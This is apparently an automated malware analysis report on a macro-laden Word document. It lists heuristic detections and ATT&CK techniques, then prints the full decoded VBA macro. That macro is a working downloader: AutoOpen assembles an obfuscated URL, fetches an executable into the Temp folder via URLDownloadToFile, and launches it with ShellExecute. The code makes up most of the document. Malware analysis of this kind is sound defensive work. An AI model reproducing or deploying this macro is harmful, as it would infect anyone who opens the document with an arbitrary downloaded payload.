Verdict: MALICIOUS
Risk Score: 238

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1071.001 Web Protocols
- T1105 Ingress Tool Transfer
The sample contains VBA macros that leverage the URLDownloadToFile API, indicating an intent to download and execute a second-stage payload. The 'Enable Macros to view full content' lure is a common technique to bypass security measures. The presence of AutoOpen and ShellExecute API references further supports the malicious nature of the document.
Heuristics (9)

- Reference to URLDownloadToFile API (critical, SC_STR_URLDOWNLOAD): Reference to URLDownloadToFile API.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code.
- URLDownloadToFile in VBA (critical, OLE_VBA_DOWNLOAD): URLDownloadToFile in VBA. Matched line in script: `Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Sub AutoOpen()`
- Environ() call (env variable access) (low, OLE_VBA_ENVIRON): Environ() call (env variable access). Matched line in script: `JkFjuexVzhTjcr = Environ("Te" & "mp")`
- Reference to ShellExecute API (high, SC_STR_SHELLEXEC): Reference to ShellExecute API.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Macro/content-enable lure (medium, SE_ENABLE_LURE): Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (referenced by macro).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4702 bytes |

SHA-256 of macros.bas: c1b51a441ba10041621879bc41698edaf8915bd63943f6d81c2fb9cb42b137ae
Preview of the extracted script (first 1,000 lines):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
#If VBA7 Then
Private Declare PtrSafe Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare PtrSafe Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal JQ1Vb72t6bIXtK As Long, ByVal JRzHJklNNL94gD As String, ByVal J8hIi9FwLiiVlr As String, ByVal Jznz68mkaaJQQS As Long, ByVal JxJfdLyE4jCnl5 As Long) As Long
Private Declare PtrSafe Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
ByVal lpBuffer As String, _
nSize As Long) As Long
Private Declare PtrSafe Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare PtrSafe Function FindWindow Lib "user32" _
Alias "FindWindowA" _
(ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare PtrSafe Function GetClassName Lib "user32" _
Alias "GetClassNameA" _
(ByVal hWnd As Long, _
ByVal lpClassName As String, _
ByVal nMaxCount As Long) As Long
#Else
Public Declare Function GetDriveType Lib "kernel32" _
Alias "GetDriveTypeA" (ByVal nDrive As String) As Integer
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, _
ByVal bFailIfExists As Long) As Long
Private Declare Function OSILlzCwXBSr Lib "urlmon" Alias "URLDownloadToFileA" _
(ByVal JJJWuPD4NeO4WF As Long, ByVal JYURvmkth8tnbT As String, ByVal JaRjJOa6JYniCR As String, ByVal JZKNefyicowIGO As Long, ByVal JNydFEvaD5IuXm As Long) As Long
Private Declare Function GetComputerName Lib "kernel32" Alias "GetComputerNameA" ( _
ByVal lpBuffer As String, _
nSize As Long) As Long
Private Declare Function FindWindow Lib "user32" _
Alias "FindWindowA" _
(ByVal lpClassName As String, _
ByVal lpWindowName As String) As Long
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function GetClassName Lib "user32" _
Alias "GetClassNameA" _
(ByVal hWnd As Long, _
ByVal lpClassName As String, _
ByVal nMaxCount As Long) As Long
#End If
Sub apiuse1()
Dim lresult As Long
Dim sBuffer As String
Dim lSize As Long
lSize = 256
sBuffer = Space(lSize)
lresult = GetComputerName(sBuffer, nSize)
If lresult <> 0 Then
sBuffer = Left$(sBuffer, nSize)
Else
End If
End Sub
Sub AutoOpen()
Dim sBuffer As String
Dim nSize As Long
Dim http As String: http = "htt" & "p://"
Dim lresult As Long
JRYfcuLs5uEk2Z = http & "ge.tt/api/1/files/67jsb5E2/0/blob?download"
nSize = 2048
JkFjuexVzhTjcr = Environ("Te" & "mp")
JBIWUgHTF3bla = JRYfcuLs5uEk2Z
sBuffer = Space(248)
lresult = GetComputerName(sBuffer, nSize)
JIgLb2TdFZHCB = JkFjuexVzhTjcr & "\" & "JTf1LX5cOyJQ7i" & ".exe"
usedownapi JBIWUgHTF3bla, JIgLb2TdFZHCB
End Sub
Sub usedownapi(ByVal JBIWUgHTF3bzla As String, ByVal JIgLb2TdFZHCaB As String)
OSILlzCwXBSr 0, JBIWUgHTF3bzla, JIgLb2TdFZHCaB, 0, 0
userunapi JIgLb2TdFZHCaB
End Sub
Public Sub GetClassNameFromTitle()
Dim sInput As String
Dim hWnd As Long
Dim lpClassName As String
Dim nMaxCount As Long
Dim lresult As Long
' pad the return buffer for GetClassName
nMaxCount = 256
lpClassName = Space(nMaxCount)
' Note: must be an exact match
sInput = InputBox("Enter the exact window title:")
' No validation is done as this is a debug window utility
hWnd = FindWindow(vbNullString, sInput)
' Get the class name of the window, again, no validation
lresult = GetClassName(hWnd, lpClassName, nMaxCount)
Debug.Print "Window: " & sInput
Debug.Print "Class name: " & Left$(lpClassName, lresult)
End Sub
Sub userunapi(ByVal JBIWUgHTF3bzla As String)
ShellExecute 0, "open", JBIWUgHTF3bzla, "", vbNullString, vbNormalFocus
End Sub
```